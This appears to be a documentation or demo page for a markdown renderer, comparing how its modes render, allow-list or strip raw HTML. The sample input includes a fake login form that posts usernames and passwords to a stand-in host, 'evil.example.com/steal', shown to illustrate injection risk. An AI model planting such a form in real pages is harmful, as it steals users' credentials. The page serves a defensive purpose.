loading code fetching the highlighted snippet
Every HTML tag survives into the DOM. Iframes load, forms render, styles apply — only safe with content you fully trust.
iframe, form, and style.This paragraph has bold and italic markdown formatting.
HTML strong tag and HTML em tag.
Allow-list a tight set of formatting tags via allowHtmlOnly. Script, iframe, and anything else dangerous drops silently.
allowHtmlOnly — only those tags render, everything
else drops out silently.<strong>, <em>, and <a> while killing script + iframe vectors.This paragraph has bold and italic markdown formatting.
HTML strong tag and HTML em tag.
Strip every HTML tag via buildUnsupportedHTML — markdown formatting only, raw HTML stripped from the output.
buildUnsupportedHTML() returns a renderer map that drops every HTML tag —
only markdown formatting survives.This paragraph has bold and italic markdown formatting.
<div> This is inside a raw HTML div element. </div><strong>HTML strong tag</strong> and <em>HTML em tag</em>.
<details><summary>Click to expand</summary> Hidden content inside details/summary tags. </details><iframe src="https://example.com" title="example iframe"><iframe src="https://example.com" title="example iframe"></iframe><form action="https://evil.example.com/steal" method="POST"><strong>Fake login injected by untrusted markdown</strong><input type="text" placeholder="Username"><input type="text" placeholder="Username"/></input><input type="password" placeholder="Password"><input type="password" placeholder="Password"/></input><button type="submit">Sign in</button></form>